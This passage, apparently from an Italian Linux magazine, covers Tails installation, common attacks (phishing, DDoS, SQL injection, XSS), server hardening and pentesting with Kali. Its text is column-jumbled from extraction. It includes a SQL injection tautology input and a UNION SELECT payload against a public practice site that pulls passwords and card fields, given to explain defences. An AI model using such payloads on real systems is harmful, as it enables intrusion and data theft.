supporto esterno. In caso contrario, sfrutta l’entropia, ovvero l’uso casuale dei
al prossimo riavvio il certificato verrà dati che si sviluppano dal movimento del
cancellato. mouse e dall’uso della tastiera

10

Importate Tails in una chiave USB
1 Assistente all’installazione
Collegatevi alla pagina ufficiale di Tails, https://tails.boum.org.
Fate click sul pulsante verde a destra, con sopra scritto Installa Tails
2.6 (la versione è aggiornata al momento in cui stiamo scrivendo).
Assicuratevi di avere un DVD vuoto o una chiavetta USB da almeno 4 GB.
3 Verifica e download
Utilizzate un client BitTorrent e fate click sul pulsante Download Torrent
File. La traduzione del sito ufficiale di Tails è ancora parziale. Questa
pagina, infatti, è ancora in inglese. Se avete Ubuntu, aprite il Software
Center e andate in Software e aggiornamenti D Altro software D
Aggiungi e importate ppa:tails-team/tails-installer.
5 Installate Tails in una chiave USB
Avviate Tails installer e scegliere la prima opzione, vale a dire
quella che permette di montare la distro in una chiavetta USB.
A tal proposito, è necessario selezionare la ISO precedentemente
scaricata da BitTorrent.
.
Anonimato online
2 Scegliete il sistema operativo
In questa guida ipotizziamo l’uso di un sistema basato su Debian.
Premete DEBIAN, UBUNTU O MINT. Se state utilizzando
un’altra distro, continuate facendo click su OTHER LINUX (RED
HAT, FEDORA, ETC.).
4 Lanciate l’installer
Il Software Center verrà aggiornato e dovreste essere in grado
di trovare l’installer pronto all’uso. Per gli utenti che utilizzano
Debian, è necessario aprire Synaptic Package Repository
e assicurarsi che la voce Jessie-backports sia abilitata.
6 Pronto all’uso
Riavviate il PC, controllate che nel menu Boot del BIOS sia impostata
la periferica USB come avvio primario. Inserite la pendrive con Tails
e godetevi l’anonimato. Come primo approccio, consigliamo
di scegliere la modalità Live. Per la persistenza ci sarà tempo.
11
 Protezione Generale

TO P S E C RE T
SSIER HACKER
DO d e i temi più
z a è u n o
La sicurez n n i. A b biamo
u e s t i a
caldi di q a ta tra le
a c a rr ell
fatto un iù s ig n ificative,
h e p
problematic lu z ioni
n do v i le s o
forne e server
per b lin d ar e P C

P
er quanto ci piacerebbe I risultati di un attacco informatico sono Gli obiettivi, infatti, sono ben altri: siti Web
affermare il contrario, Internet infiniti. Per restringerne gli effetti, o infrastrutture di rete di vitale importanza.
non è tutto rose e fiori. Certo, potremmo definirli in tre categorie: lieve, In tali casi, il movente è molto più ampio
gli aspetti positivi della Rete quando i danni sono limitati e per risolvere rispetto al semplice furto. Si tratta
sono tanti, ma a controbilanciare la partita basta cambiare una o più password. Medio, di spionaggio industriale o comunque
c’è tutto il sottofondo di malintenzionati se perdete dati personali o file importanti di attività che hanno come obiettivo
che hanno come solo obiettivo rubare, come foto o documenti che comunque il mettere KO uno o più organi
estorcere, deturpare, infettare possono essere recuperati tramite un di comunicazione internazionali. Tutto
e danneggiare qualsiasi asset è basato sull’informatica
digitale. Tutto ciò che viene
memorizzato sul vostro PC può “La maggior parte degli e se si mettono i bastoni fra
le ruote ai sistemi che
essere rubato: password, liste
di contatti, dati della carta
attacchi informatici è rivolta governano l’andamento
di una nazione, è il Paese
di credito e via dicendo. I metodi
con cui i cracker riescono
verso infrastrutture aziendali” stesso a fermarsi. I dipendenti
di Belgacom, per esempio,
nell’interno sono tanti. Si parte da semplici backup. Disastroso, quando vi prosciugano si sono trovati di fronte a un attacco
trucchi di ingegneria sociale come le email il conto corrente o rubano la vostra identità Watering Hole che faceva capo al
di phishing, fino ad arrivare a espedienti più digitale. A fronte di tutto ciò, è però programma QUANTUMINSERT del GCHQ.
mirati. Un Javascript malevolo iniettato importante fare una considerazione. In pratica, ogni loro connessione verso
tramite un annuncio pubblicitario di terze Gli attacchi, tranne rari casi, non sono quasi LinkedIn o Slashdot veniva rimandata
parti potrebbe essere un valido esempio. mai rivolti verso il vostro computer. a copie fasulle di questi due servizi.

12
 Come operano gli hacker

Sicurezza domestica
Seguite questi suggerimenti per evitare di diventare un bersaglio

I
n primo luogo è importante sfatare un mito: i virus
per Linux esistono, così come ci sono diverse soluzioni
antivirus adatte al Pinguino. La scarsa diffusione
sul nostro sistema è dovuta al fatto che mal si digerisce
il download di programmi non richiesti dal Web. La maggior
parte degli utenti, infatti, utilizza il proprio gestore
pacchetti per scaricare i software. Così facendo, si sfrutta
un sistema che verifica l’integrità e l’autenticità di tutto
ciò che viene messo a disposizione. Il rischio di contrarre
dei malware è ridotto al minimo.
I team di sviluppo che fanno capo alle distro sono sempre
pronti a correggere le falle della sicurezza che di tanto in tanto
vengono segnalate. A meno di non utilizzare una distro source-
based come Gentoo, i pacchetti di riqualificazione sono
sempre a portata di mano e richiedono solo qualche secondo
tra download e installazione. Nella maggior parte dei sistemi
domestici, l’interfaccia grafica è poi uno strumento che rende
l’aggiornamento un processo semplice, intuitivo e alla portata
di tutti. Non bisogna mai scordare che la chiave per dormire
sonni tranquilli è avere una distro sempre al passo con i tempi.
Gli update, infatti, oltre ad aggiungere funzioni e risolvere
eventuali problemi hardware o software, devono essere
considerati come il principale baluardo contro
i malintenzionati. I cracker tendono a sfruttare le falle del
sistema per entrare. Se tutti i possibili appigli vengono rimossi
da un aggiornamento sistematico da parte del team
di sviluppo, le probabilità che il delinquente di turno riesca
a penetrare sono minime. Sempre per quanto riguarda
la presupposta invulnerabilità di Linux ai virus, è opportuno
considerare un altro aspetto importante. Molti attacchi
di natura recente sono multipiattaforma. Quando viene
scoperta una vulnerabilità su un plug-in di Chrome, per
esempio, a farne le spese non sono solo gli utenti Windows,
ma anche quelli che usano Mac OS X e Linux. Per citare un
episodio reale, basta pensare a Flash. Uno degli add-on più
inflazionanti in quanto ad attacchi e problemi di sicurezza.
È facile prendersela con i suoi sviluppatori e con la casa
madre. Il motivo per cui i cracker lo usano come vettore per
entrare nei nostri sistemi è proprio la sua popolarità. Flash
è utilizzato da milioni di persone che tuttora ne ignorano la
pericolosità. È proprio l’ignoranza a essere il principale cavallo
di Troia che i malintenzionati utilizzano più spesso. Per fortuna,
però, l’esperienza insegna e anche colossi del calibro di Adobe
e Microsoft hanno fatto passi avanti. Anche loro stanno
spingendo i propri utenti ad abbandonare Flash e Silverlight.
Il tutto a favore di HTML5. Molti di voi si staranno
domandando come si può vivere senza Flash. Parecchi siti
continuano a usarlo e se siete soliti visitarli spesso potreste
andare incontro a problemi di compatibilità. La soluzione
è però a portata di mano. Basta installare Flashblock in modo
da attivare Flash solo su richiesta. Naturalmente faremmo
uno sbaglio a considerare il plug-in di Adobe come unico
responsabile dei nostri guai. Navigando in Rete si può
incappare in molti Javascript altrettanto dannosi. Ecco perché
installare un add-on come NoScript diventa essenziale.
Probabilmente dovrete configurare una whitelist di siti
attendibili in cui far lavorare i JS, ma per il resto potrete
lasciare fuori dalla porta quelle pagine che li utilizzano in modo
fraudolento. Un altro componente aggiuntivo che non può
mancare è AdBlockers. Serve per bloccare la pubblicità che
talvolta veicola verso siti poco o per niente sicuri. Infine, per
garantirvi una buona sicurezza, è fondamentale mantenere
sempre aggiornato il firmware del vostro router. Eviterete così
di farlo prendere di mira da chi ne sfrutta le vulnerabilità.
Quando si parla di Flash, agli esperti di sicurezza si rizzano i capelli.
Perfino Adobe sta prendendo le distanze dal suo plug-in

Internet delle cose (cattive)

Sempre più spesso si sente parlare
di Internet delle cose. Un mondo dove tutto
è interconnesso alla Rete e dove perfino
il frigorifero vi avvertirà se state finendo
il latte con un messaggio di posta
elettronica. A prima vista si tratta di un
balzo in avanti eccezionale. Se però vi
soffermate per un attimo a definire i rischi
per la sicurezza, l’euforia passa in un
momento. Certo, la maggior parte di questi
sistemi si baserà su tecnologia embedded
molto facile da aggiornare, ma gran parte
dell’hardware funziona ancora con driver
binari. Per le loro caratteristiche
intrinseche, nel caso dovessero essere
scoperte falle di sicurezza, non sarà
possibile aggiornarli. L’unico modo per
risolvere sarà acquistare lo stesso
dispositivo ma con una versione dei driver
più recente. In un certo qual modo,
comunque, chi possiede un Raspberry Pi
può essere graziato. Sfruttando la porta
GPIO, si connette a qualsiasi dispositivo
(sensori, telecamere e via dicendo) e può
essere usato per l’aggiornamento dei driver.
Si tratta però di una procedura non alla
portata di tutti, ma solo degli utenti più
esperti e smaliziati. Prima di fare un balzo
nel futuro, quindi, valutate attentamente
i rischi che si corrono.

13
 Protezione Generale

Tecniche di hacking
La conoscenza è il primo baluardo contro i pericoli

P
rima di iniziare a fantasticare su tutti i metodi più
esoterici e meravigliosi con cui i vostri dati possono
essere compromessi, partiamo dal più comune:
l’ingegneria sociale. Si tratta di gran lunga del sistema
più semplice che un cracker può mettere in pratica per
appropriarsi delle vostre credenziali di accesso. In pratica,
siete voi stessi a fornirgliele di spontanea volontà.
Lui deve solo darvi un buon motivo per farlo.
Il primo consiglio che ci sentiamo di darvi è fare sempre
massima attenzione quando ricevete email da sconosciuti.
Non solo, ma dovete aguzzare bene la vista anche quando
arrivano strane richieste dalla vostra banca o dalle Poste.
Uno degli stratagemmi più usati è quello di simulare
comunicazioni da istituti di credito, in cui è richiesta la
conferma dei vostri dati di accesso per l’home banking. Il link
presente nel corpo del messaggio rimanda a un falso sito
costruito con le stesse sembianze di quello della banca.
Nel momento in cui inserite le credenziali all’interno dei
campi dinamici, il cracker ha vinto. Infatti, si è impossessato
del vostro nome utente e password per accedere al conto
corrente o alla riserva della carta di credito. Per fortuna,
la maggior parte dei malintenzionati non rientra tra i nostri
connazionali. Le email di phishing più comuni sono spesso
sgrammaticate e piene di refusi. Basta davvero poco per non
cadere nel tranello. I cracker d’oltralpe, infatti, si affidano
di frequente ai traduttori online per scrivere in italiano.
Diverso è invece l’attacco del vero professionista, vale a dire
colui che studia e si approccia alla vittima in modo strutturale,
organizzato e impeccabile. In questo caso, non troverete
alcun errore grammaticale nelle email. La grafica sarà precisa
e perfettamente riconducibile a quella usata dalla banca
o dalle poste. L’unico appiglio che potete sfruttare per non
dargli in pasto ciò che vuole è analizzare il link a cui dovreste
collegarvi. Seppure i nomi di dominio utilizzati siano molto
simili a quelli della vostra banca, non saranno mai identici.
Ci sarà sempre una seppur minima difformità. Considerate

Se non credete che gli attacchi DDoS siano reali, date un’occhiata a www.digitalattackmap.com

DDoS – Il corpo contundente degli attacchi di Rete

Distributed Denial of Service (DDoS)
è probabilmente il sistema meno raffinato per
mettere KO un servizio di Rete. Ciò nonostante,
è anche il più utilizzato. In sostanza, DDoS
consiste nel bombardare un sito con un volume
di traffico enorme proveniente da più host
(da qui il termine Distribuited). In tal modo,
il server non è più in grado di distinguere
le richieste legittime da quelle fittizie, finendo
così per disconnettersi. Ci sono diversi
strumenti, come Slow Loris o Low Orbit Ion
Canon (LOIC), che permettono di approntare
un attacco DDoS senza particolari conoscenze
tecniche. Tuttavia l’azione umana in seno
a questo strumento è stata soppiantata dalle
macchine. Sono enormi schiere di botnet
a portare a compimento il lavoro sporco.
Un attacco DDoS prende in esame delle
semplici considerazioni logiche. Le richieste
da inviare devono essere brevi, così da
massimizzarne la velocità. È poi importante che
siano abbastanza elaborate da mandare in tilt
il server. Quest’ultimo, trovandosi a impegnare
una mole ingente di risorse per gestire
le risposte, sarà così costretto a cadere.
In parole semplici, potremmo definire il DDoS
un’indigestione di dati.

14

poi che negli ultimi anni tutti i siti che contengono informazioni
sensibili fanno uso dei certificati SSL Extended Validation.
Questi sono soggetti a un vasto controllo delle autorità di
certificazione. Al momento della connessione, vengono validati
mediante il browser. Oltre al familiare lucchetto che compare
nella barra degli indirizzi, potrete visualizzare il nome della
società che utilizza il certificato. Tutte le banche si servono
dello standard EV. Basta solo controllare le informazioni
riportate nel documento di certificazione, per essere sicuri di
aver stabilito un collegamento con il sito ufficiale dell’istituto.
Infine, fate appello al buon senso e alle comunicazioni ufficiali
che derivano dagli organi preposti alla sicurezza informatica.
Nessun ente statale o privato come la banca o le Poste chiede
di confermare i vostri dati di accesso al servizio di home
banking, così come non richiede alcun inserimento del
numero della carta di credito. Se proprio siete in dubbio, fate
una telefonata e parlate con un consulente della vostra filiale.
Un recente attacco di phishing, descritto dalla Polizia Postale
come ad alto rischio, prende in considerazione il naturale
terrore che gli italiani hanno per Equitalia. Il cracker di turno
invia un’email spacciandosi per il noto agente della riscossione
pubblica, reindirizzandovi a un falso sito di Unipol Banca.
La scusa adottata consiste nella possibilità di visualizzare un
atto amministrativo a vostro nome. Un altro attacco molto
utilizzato è SQL injection. La sua nascita può essere ricondotta
alla fine degli anni novanta. Nonostante questo sistema abbia
compiuto 16 anni, continua a essere di moda. Ne sono nate
diverse varianti, ma il fulcro dell’attacco rimane sempre
il codice SQL. Quest’ultimo, infatti, viene utilizzato come
vettore per interagire con la macchina che veicola informazioni
e accede al database. Per rendere ancora più chiaro
il concetto, facciamo un esempio pratico. I moduli di contatto
che trovate su molti siti utilizzano PHP come front-end per
interagire con il database. Supponiamo di avere un form
semplice con i campi per username e password. Il modulo
utilizza il seguente segmento PHP per verificare le credenziali
(tramite una richiesta HTTP Post) sul MySQL:
$query = “SELECT * FROM users WHERE username = ‘” +
$username + “’ AND password = ‘” + $password + ‘”;
A prima vista il codice sembra innocuo. Abbiamo
accuratamente annidato le virgolette singole, così che le
variabili PHP vengano passate in modo appropriato al
database. Tuttavia, se fate attenzione, vi accorgerete che
l’input dell’utente non è stato sterilizzato (si presuppone che
le variabili $username e $password vengano passate allo stato
puro dal modulo al MySQL). Torniamo a fare un esempio
per meglio spiegare cosa succede in questo caso.
Supponiamo di inserire zelda’ OR 1=1 nel campo password.
Notate l’uso particolare della virgoletta. Essa ha il compito
di confondere la query SQL. Infatti, tutto ciò che la segue
verrà trattato come parte integrante della query stessa.
Così facendo, sia che si inserisca un nome utente non valido
o un username la cui password non è zelda, la query può
essere associata a tutti gli utenti grazie alla tautologia 1=1.
A seconda del motore SQL, sarà possibile connettersi con
il primo user presente nella tabella che spesso corrisponde
all’amministratore. Per funzionare a dovere, c’è da dire che
questo trucco ha talvolta bisogno di ben altri stratagemmi.
Tuttavia è possibile risolvere con un po’ di tenacia e abilità.
Gli attacchi SQL injection possono essere molto più avanzati
Come operano gli hacker
e distruttivi di quello che abbiamo appena proposto. In linea Lo script
di principio, con un’azione del genere niente vieta di cancellare Python
un intero database o aggiungere un utente di nascosto per sqlmap può
entrare quando si vuole. Il tutto può essere fatto senza l’uso scansionare
di codici esterni. Basta manipolare l’URL o in generale la tutte le
vulnerabilità
richiesta HTTP POST. Se volete approfondire il tema del SQL
per evitare un
Injection, vale la pena di leggere “Everything you wanted to
SQL injection
know about SQL injection (but were afraid to ask)” di Troy
Hunt (http://bit.ly/TroyHuntUOnSQLInjections). Un altro
attacco da prendere in considerazione è il Cross-Site Scripting
(XSS). Con questi termini ci riferiamo a una serie di falle
che un cracker può sfruttare per iniettare i propri frammenti
di codice su un server. Di solito si utilizza Javascript che però
viene eseguito dal lato client. In tal caso, quindi, non si parla
di un attacco server diretto.
INXS(S)
Questo genere di attacchi si basa sulla fiducia che gli
utenti dimostrano verso i siti che reputano di conoscere.
Disabilitando plug-in come NoScript o Adblock, si
concede alla pagina la possibilità di eseguire script.
Sfruttando XSS (Cross-site scripting), vale a dire una
vulnerabilità tipica dei siti che non blindano a dovere
i propri form, si può cadere preda di codice malevolo.
Infatti basta inviare un commento o un post su un forum,
per vedersi iniettata una stringa pericolosa. Un esempio
che possiamo citare riguarda il worm Samy che ha
proliferato in tutta MySpace nel 2005. Al tempo, questa
comunità poteva essere paragonata all’attuale Facebook.
Il virus in sé non era particolarmente malvagio. Aveva il
compito di aggiungere del testo ai profili degli utenti che
così venivano messi in contatto con l’autore del worm Samy
Kamkar. Il risultato in sé, però, non è tanto negli effetti,
quanto nella diffusione. In pochissimo tempo, Samy è stato
aggiunto come amico da milioni di utenti. Nonostante
i trascorsi e le relative conseguenze, il programmatore
del worm più famoso dell’epoca pre-Facebook è diventato
un leader nel campo della sicurezza (http://samy.pl).
Comunque sia, il concetto alla base di questa storia
è semplice: un malintenzionato che riesce ad accedere
indebitamente a un database ha un enorme potere tra le
mani. È vero che nella maggior parte dei casi le password
non sono memorizzate per intero. Tuttavia, sfruttando
strumenti per il Brute Force come John The Ripper,
la probabilità di far collidere gli hash non è poi così remota.
15
 Protezione Generale

Difesa e protezione
Mettersi al sicuro non è sempre un’operazione semplice

L
a maggior parte delle distro Linux è configurata
con impostazioni di sicurezza ragionevoli. Tuttavia
c’è sempre spazio per migliorare. Uno dei primi
controlli da fare consiste nel verificare l’abilitazione dei
vettori che possono essere usati per un attacco. Valutate
quindi i servizi in esecuzione con $ systemctl status
in una piattaforma Systemd-based. Una volta fatto,
disabilitate tutto ciò che non è necessario e approfondite
la natura dei processi che non comprendete.
La configurazione più popolare è lo stack LAMP
(o equivalente). Per funzionare, richiede la sola esecuzione
di Apache e MySQL. Naturalmente è opportuno abilitare
anche SSH per gestire in modo sicuro i processi
di amministrazione. L’abbiamo già detto prima, ma lo
ripetiamo volentieri per i SysAdmin: i pacchetti devono
essere sempre aggiornati! Se si vuole veramente essere
al sicuro, è fondamentale rimanere informati sulle ultime
vulnerabilità. Solo così, potrete approntare seduta stante
gli update più critici. Su Common Vulnerabilities and
Exposure potrete trovare molte informazioni interessanti
(www.cvedetails.com). Se notate qualcosa di strano che
la vostra distro non ha ancora provveduto a mettere in
sicurezza, disattivate il servizio incriminato. Spesso,
tuttavia, non è neppure necessario agire in modo così
Metasploit Framework è una risorsa straordinariamente preziosa
per eseguire dei test di sicurezza in maniera professionale
drastico. Il report di vulnerabilità, nella maggior parte dei
casi, contiene una soluzione che temporaneamente mette
una toppa alla falla.
Sicuri con Secure Shell
Per essere ancora più tranquilli, si possono adottare
ulteriori accorgimenti. In primo luogo, iniziate bloccando
il servizio SSH. Evitare che qualcuno acceda da remoto
al vostro utente root è sempre una buona idea. In linea di
principio, non dovreste mai collegarvi con poteri di admin
a meno che non sia strettamente necessario. È meglio
agire da utente standard per poi passare a root tramite
la linea di comando. Assicuratevi che il vostro profilo sia
abilitato a utilizzare le istruzioni adatte. In caso contrario,
quando aggiungete la riga
PermitRootLogin no
a /etc/ssh/sshd_config per poi riavviare il servizio, non
potrete accedere come root. Al posto del tradizionale
log-in con username e password, è meglio puntare
sull’autenticazione tramite valori SSH. Generate una
coppia di chiavi sul computer locale, quindi caricate quella
pubblica sul server:
$ ssh-keygen
$ ssh-copy-id user@host
Sostituite user e host con i vostri dati, quindi premete
Invio. Il primo comando genera una coppia di chiavi
RSA a 2.048 bit, mentre il secondo aggiunge la chiave
pubblica su ~/.ssh/authorized_keys nel server. Adesso
dovreste essere in grado di abilitare SSH puntando alla
vostra chiave privata:
$ ssh -i ~/.ssh/id_rsa user@host
Il file che la contiene deve essere tenuto in grande
considerazione. Molti preferiscono salvarlo su una
pendrive USB. Dovete stare molto attenti. Non si può né
perdere, né lasciare in giro alla portata di tutti. Una volta
che siete sicuri e avete preso confidenza con la nuova
procedura di accesso, disabilitate il login tramite
username e password con l’istruzione:
PasswordAuthenticaion no
su /etc/ssh/sshd_config nel server. I login tramite

Non si è mai del tutto al sicuro

Sfortunatamente, anche se si prendono
le precauzioni del caso, non si può mai
scongiurare del tutto la possibilità di cadere
vittime di un hacking. Potreste rendervene
conto in modo del tutto inaspettato. Magari
il vostro sito Web non permette più di
eseguire il login o forse non riuscite
ad aprire le pagine. A questo punto, prima
di prendere il telefono e inveire contro il
vostro provider, è meglio capire bene cos’è
successo. In primo luogo prendete in
considerazione la possibilità di essere stati
colpiti da un attacco DDoS. Fornite tutte
le indicazioni più utili al servizio tecnico,
così che possano darvi una mano. Se invece
riuscite ancora ad accedere al server,
la prima cosa da fare è disabilitare tutti
i servizi. A tal proposito, è opportuno
consultare i file di log per capire
esattamente quando è avvenuto l’attacco
e cosa è stato danneggiato. Prima di
ripristinare eventuali copie di backup,
è infatti essenziale appurare la finestra
temporale in cui si è svolto l’assedio. In
caso contrario, potreste ristabilire file già
danneggiati. Se state gestendo un database
con dati sensibili, secondo le normative
vigenti in alcuni paesi, è necessario
segnalare l’accaduto anche a specifici
organi governativi.

16
 Come operano gli hacker

Mettete al sicuro il server Web

Se il vostro server Web montato su macchina
Debian gestisce pagine statiche, anche se
Apache è presente, non dovreste avere grossi
problemi. Tuttavia ci sono ulteriori margini
per migliorare la sicurezza. In primo luogo,
utilizzate Encrypt (https://letsencrypt.
org) che fornisce un sistema gratuito per
l’uso dei certificati SSL. In tal modo, i vostri
utenti potranno navigare tranquillamente sul
sito, senza preoccuparsi che qualcuno possa
intercettare i dati. Se state gestendo
informazioni sensibili, allora consigliamo
di acquistare un certificato convalidato.
Per risolvere eventuali problemi dovuti a falle
nella crittografia, potete anche modificare
la configurazione affinché non vengano
accettati standard troppo obsoleti. Basta
aggiungere queste righe in Apache:
SSLCompression off
SSLProtocol All -SSLv2 -SSLv3
SSLCipherSuite EECDH+AESGCM:EDH+
AESGCM:AES256+EECDH:AES256+EDH
In tal modo, potrete prevenire attacchi tipo
BEAST, LOGJAM e CRIME, disabilitando
al contempo SSL v2 e 3. Chiunque utilizzi
vecchi browser come Internet Explorer 6
non sarà in grado di visualizzare il sito.
Per approfondire la configurazione, date
un’occhiata all’indirizzo http://bit.ly/
StrongSSLSecurityOnApache.
Ci sono poi alcune intestazioni di sicurezza
rispettate da diversi browser e utili ad
attenuare svariati attacchi. Per esempio
è possibile impostare:
Header set X-Frame-Options: sameorigin
Header set X-XSS-Protection: 1;mode=block
Header set X-Content-Type-Options: nosniff
Eviterete infrazioni in stile clickjacking e XSS.
Non solo, ma sarete brillantemente in grado
di scongiurare eventuali tentativi
di determinare il MIME dei file scaricati.
Massimo rendimento con il minimo sforzo.

password sono intrinsecamente poco sicuri. Le persone

tendono a riciclare le parole di accesso, usando termini
comuni che tengono bene a mente. Considerate poi che
ogni account utente presente sul server ha un accesso
superuser che deve essere protetto da una chiave. A tal
proposito, vale la pena di servirsi di fail2Ban, in modo che
i client che tentano più volte di autenticarsi senza risultato
vengano bannati temporaneamente. Trovate una guida
dettagliata sull’argomento all’indirizzo http://bit.ly/
Fail2BanOnDebian7. Seppure sia stata scritta per Debian
7, si applica a tutte le distro Linux. Fail2Ban non protegge
solo SSH, ma qualsiasi servizio. In più lo potete usare
per fermare i bot che martellano il server Web.
La configurazione è molto semplice. Basta impostare i limiti
entro cui il plug-in attiva il suo blocco temporaneo. Fail2Ban
utilizza iptables che ha il compito di gestire in modo
eccellente l’eventuale sovraccarico di risorse, infatti,
le richieste non autorizzate da parte dei client vengono
automaticamente eliminate. Per rilevare eventuali picchi di utilizzo sul server, utilizzate uno strumento
di monitoraggio come Munin
Test di penetrazione con Kali
L’ottimizzazione di un server dal punto di vista della tranquillità consiste nello scaricare l’applicazione Mutillidae
sicurezza diventa ancora più difficile quando si ha a che fare del progetto OWASP. La trovate su http://sourceforge.
con database e applicazioni Web. Questi elementi, infatti, net/mutillidae dove sono presenti anche svariati video
ampliano a dismisura la superficie di attacco, rendendovi tutorial. Un’altra soluzione è utilizzare una sandbox come
molto più esposti ai rischi. Pensate alla libertà che talvolta Acunetix (http://testphp.vulnweb.com). Per esempio,
ci prendiamo nel consentire un criterio di accesso troppo date un’occhiata a cosa succede quando vi collegate
blando a una directory. Se impostate un file in scrittura di
troppo, potreste passare una giornata tra le peggiori della
vostra vita. Sul DVD allegato a questo numero di Linux Pro “Le falle che i cracker sfruttano
troverete Kali Linux, una distro pensata per massimizzare
la sicurezza di un’infrastruttura di rete. Contiene una serie
più spesso sono causate da errori
di strumenti per valutare lo stato di protezione, nonché di configurazione del server”
per mettere alla prova i vari servizi. Si tratta di applicazioni
che possono essere trovate su Internet, ma averle tutte al seguente URL (gli spazi sono intenzionali):
a portata di mano è molto più comodo. Tutti i software sono http://testphp.vulnweb.com/artists.php?artist=-1 UNION
presenti nei menu di Kali. Per ragioni di spazio, purtroppo SELECT 1,pass,cc FROM users
non possiamo citarli singolarmente. Collegatevi a http:// Il fatto è che non dovreste essere in grado di accedere. Ecco
kalitutorials.net per dare un’occhiata ai diversi tutorial. perché è importante sterilizzare qualsiasi input da parte
Provare un test di penetrazione su un sito potrebbe essere dell’utente non appena colpisce la vostra applicazione.
molto divertente. Tuttavia, se non avete il permesso esplicito Per l’occasione, utilizzate tecniche come:
da parte dell’amministratore, non fatelo nel modo più var_dump(filter_var($artist,FILTER_SANITIZE_SPECIAL_
assoluto. Anche se non danneggiate alcunché, andreste CHARS));
incontro a grossi guai. Il modo migliore per divertirsi in tutta In questo modo potrete stare molto più tranquilli.

17
 Protezione Generale

La guerra del futuro

Sempre meno bombe e più attacchi informatici

L
a storia della codifica dovrebbe averci insegnato una
lezione importante: i programmatori commettono
degli errori (sono esseri umani anche loro). Per quanto
i team di sviluppo si sforzino, è impossibile pretendere fin da
subito un prodotto perfetto. Certo, tutti possono migliorare
mettendo in campo soluzioni ad hoc e perfezionare le
proprie infrastrutture, ma ci sarà sempre spazio per l’errore
umano. Anche se non vi fosse niente a cui appellarsi, siamo
altrettanto sicuri
che i cattivi di turno
riusciranno
“La crittografia avanzata
a ingegnarsi per
trovare soluzioni
ha rotto le uova nel paniere
sempre nuove a parecchie potenze mondiali”
e alternative.
A riprova di quello che diciamo, nel momento in cui stiamo
scrivendo, sono stati scoperti due nuovi bug in OpenSSH
(CVE-2016-0777 e -8). Nikola Tesla, in un suo scritto dei primi
del XX secolo, ha affermato che la guerra futura sarebbe stata
combattuta da macchine e robot. Concedendogli un minimo
di licenza artistica, non si può non dargli ragione. Basta
guardare ai vari droni che sorvolano le zone calde del globo,
così come ai robot che disinnescano le bombe senza mettere
in pericolo gli esseri umani. Assumendo le tendenze future,
ci spingiamo oltre: il vero campo di battaglia del XXI secolo
è online. Sempre più nazioni stanno mettendo all’opera
eserciti di esperti in sicurezza che hanno il compito di
paralizzare le infrastrutture del potenziale nemico. A dicembre
2015, per esempio, si è verificato un enorme calo di tensione
in tutta l’Ucraina occidentale. A causare questo evento non
è stato qualche albero caduto sulla linea elettrica, bensì
un potente attacco informatico di un gruppo di attivisti mossi
da animosità politica. Perché
ci si dovrebbe preoccupare
di bombardare un obiettivo
strategico, quando si può
semplicemente tagliare
fuori dalla civiltà un’intera
nazione bloccandone
l’approvvigionamento elettrico o idrico? Gli hacker così detti
dal “colletto bianco” stanno sperimentando nuovi metodi
per applicare exploit su larga scala. Se un attaccante
è abbastanza motivato e supportato (per esempio da uno
Stato sovrano) può causare danni incalcolabili all’economia
di un paese nemico. Il tutto, spesso, parte da un piccolo
campanello d’allarme. Nel caso dell’Ucraina che abbiamo
appena citato, l’avvio del focolaio è stato causato da un
attacco spear-phishing con un documento Word.

Hacking e statistiche - Il più grande exploit

Anthem
Il gigante della sanità statunitense è stato
infettato con il malware Avast del gruppo
Black Vine nel maggio 2014. La violazione,
però, è stata scoperta solo a febbraio
del 2015. Oggetto dell’attacco è stato
un insieme di ben 80 milioni di cartelle
cliniche. Gli analisti, tuttavia, hanno
suggerito che il gruppo non avesse
interessi primari nella sottrazione di tali
dati. Secondo Symantec, Black Vine
ha mostrato molto più interesse per
i contractor di Defence and Energy,
cercando dati sensibili all’interno delle
cartelle di questi individui. Tenuto conto del
volume di informazioni personali trapelate,
non è da escludere che molti dati vengano
poi rivenduti sul mercato nero.
OPM
L’ Office of Personnel Management degli
Stati Uniti è responsabile della tenuta
di tutti i registri dei dipendenti pubblici
del governo. Nel giugno 2015, è stata
annunciata una violazione della sicurezza
che si perpetrava dal maggio dell’anno
precedente. Secondo le stime più
accurate, a rischio si sono trovate ben
21,5 milioni di persone, inclusi militari,
operatori stranieri e molte altre categorie.
All’interno di queste informazioni erano
poi presenti ben 5 milioni di impronte
digitali. I costi del danno si contano in
miliardi di dollari. I funzionari USA hanno
riferito che gli attacchi avevano origine
dalla Cina. Ciò detto, si sono affrettati
a dire che non c’erano prove riguardo
a un potenziale coinvolgimento del
governo asiatico. In effetti, gli aggressori
possedevano credenziali di accesso
valide, probabilmente ottenute tramite
esperimenti di ingegneria sociale.
È emerso che gran parte dei dati OPMS
sono stati memorizzati su sistemi
mainframe arcaici che eseguono codice
COBOL antiquato.
Hacking Team
È difficile non sorridere beffardamente
al destino della società che ha venduto
strumenti di intercettazione a regimi
oppressivi in Sudan, Russia e Arabia
Saudita. L’unica ragione per cui sappiamo
quello che è accaduto va ricondotta
al fatto che qualcuno ha rubato 400 GB
di documenti secretati, rendendoli poi
pubblici su Twitter. Hacking Team si è più
volte definita come fornitore di strumenti
di sorveglianza per le forze di polizia,
dichiarandosi estranea alla collaborazione
con governi canaglia. Peccato che
i documenti trapelati attestino
esattamente il contrario. Alcuni file
testimoniano come Hacking Team sia
stato alla base di alcuni zero-day utili
a infettare specifici obiettivi tramite
il proprio spyware RTS. Una volta resa
pubblica la vicenda, le vulnerabilità
rilevate sono state corrette in tutta fretta.
Hacking Team, comunque, continua a fare
affari, anche se non è ancora chiaro
in che modo.
Fiat Chrysler
Si fa un gran parlare delle macchine
del futuro costantemente collegate
a Internet. Le persone, però, dovrebbero
sapere come un’auto connessa al Web
possa essere violata al pari di qualsiasi
computer. L’hack che ha fatto più
scalpore in questo senso è stato quello

18
 Dossier hacker

Il concetto di crittografia
Gli attuali governi sono sempre più interessati alle attività
dei ricercatori impegnati sul fronte della sicurezza. Infatti,
sfruttando numerose aggiunte agli accordi di Wassenaar
(una serie di linee guida che i firmatari si impegnano
a seguire), le nazioni stanno rendendo sempre più difficile
per gli studiosi condividere i risultati in campo informatico
al di fuori dei propri confini. Ostacolare questo sviluppo segna
un pericoloso precedente. L’anno scorso, il premier inglese
David Cameron ha snocciolato una serie di commenti sulla
possibilità di vietare la crittografia. Da allora, il suo ufficio
si è impegnato a ritrattare le dichiarazioni, affermando che
quanto detto dal primo ministro d’oltre manica fosse stato
frainteso. Tuttavia, la proposta contenuta nel piano
denominato Investigatory Powers Bill (un volume di oltre
300 pagine) prevede di costringere gli ISP a fornire i dati
